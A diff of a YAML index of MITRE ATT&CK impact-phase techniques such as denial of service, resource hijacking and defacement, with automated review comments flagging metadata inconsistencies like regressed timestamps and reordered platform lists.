- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
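Review bot: across this hunk and the one above, the `Cisco DoSdetectNetflow`, `Cloudflare ReflectionDoS May 2017` and `Cloudflare Memcrashed Feb 2018` references are only moved within `external_references`, with identical description and url text, so roughly thirty changed lines carry no semantic change; the only real edits are `x_mitre_attack_spec_version` 3.1.0 to 3.2.0 and the dropped `spec_version`. A stable sort on `source_name` in the generator would keep these regenerations reviewable.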
@@ -58823,7 +59595,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -58834,17 +59605,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -58881,7 +59647,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -58902,7 +59669,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
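Review bot: T1491's `modified` timestamp goes backwards here, from 2022-05-11 to 2022-03-25, and the same regression appears for T1491.001 (2022-11-08 to 2022-07-28) and T1486 (2022-11-08 to 2022-06-16) further down; those entries also keep `x_mitre_attack_spec_version: 2.1.0` while every other entry in the diff is bumped to 3.2.0. That pattern suggests these three are being read from a different or older STIX snapshot than the rest, so please check which bundle the generator uses for them before merging.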
@@ -58929,12 +59696,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
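Review bot: T1491 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` at the end of its entry with nothing added in their place, unlike the neighbouring entries that receive `x_mitre_attack_spec_version: 3.2.0`; unless the field is emitted elsewhere in T1491, this leaves it as the one technique in the block without a spec version. The new T1496.002 entry is consistent with its three references, though `x_mitre_detection: ''` means only its `x_mitre_data_sources` list carries any detection guidance.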
@@ -58967,7 +59800,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -58977,10 +59810,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
@@ -59043,7 +59875,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -59084,7 +59915,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -59105,9 +59936,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
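Review bot: both new sub-techniques in this hunk, T1496.004 and T1496.001, ship with `x_mitre_detection: ''`, so anything that renders detection guidance from this index will show a blank for them even though `x_mitre_data_sources` (for example `Cloud Service: Cloud Service Modification` and `Application Log: Application Log Content`) is populated; consider falling back to the data-source list in the renderer. T1496.001's description and references are the text removed from the parent T1496 below, which is expected for the split, and the T1496.004 description string ends in a trailing space (`availability. "`) inherited from upstream.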
@@ -59160,11 +60139,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -59187,6 +60165,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -59204,9 +60183,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -59232,9 +60212,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests:
- name: Azure AD - Delete user via Azure AD PowerShell
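Review bot: the T1531 entry retains an atomic test named `Azure AD - Delete user via Azure AD PowerShell` while this same diff removes `Azure AD` from the platform lists of other techniques and replaces `Office 365` with `Office Suite` here; confirm the test's platform tagging and any platform-keyed index still pick this test up under the new platform names.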
@@ -59390,7 +60369,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
@@ -59414,12 +60393,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -59438,7 +60416,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -59455,18 +60432,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
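Review bot: in the T1499 platform list `IaaS` is removed and then re-added two lines lower, so the net change is only the removal of `Azure AD`, `Office 365`, `SaaS` and `Google Workspace`, with `IaaS` and `Containers` retained; in T1498.002 and T1499.002 above `IaaS` stayed in place, which indicates the upstream list order changed. Emitting list entries in a canonical order would make the real platform change obvious at a glance.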
@@ -59490,8 +60462,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -59511,33 +60483,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -59548,7 +60509,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -59565,8 +60526,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -59585,99 +60549,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
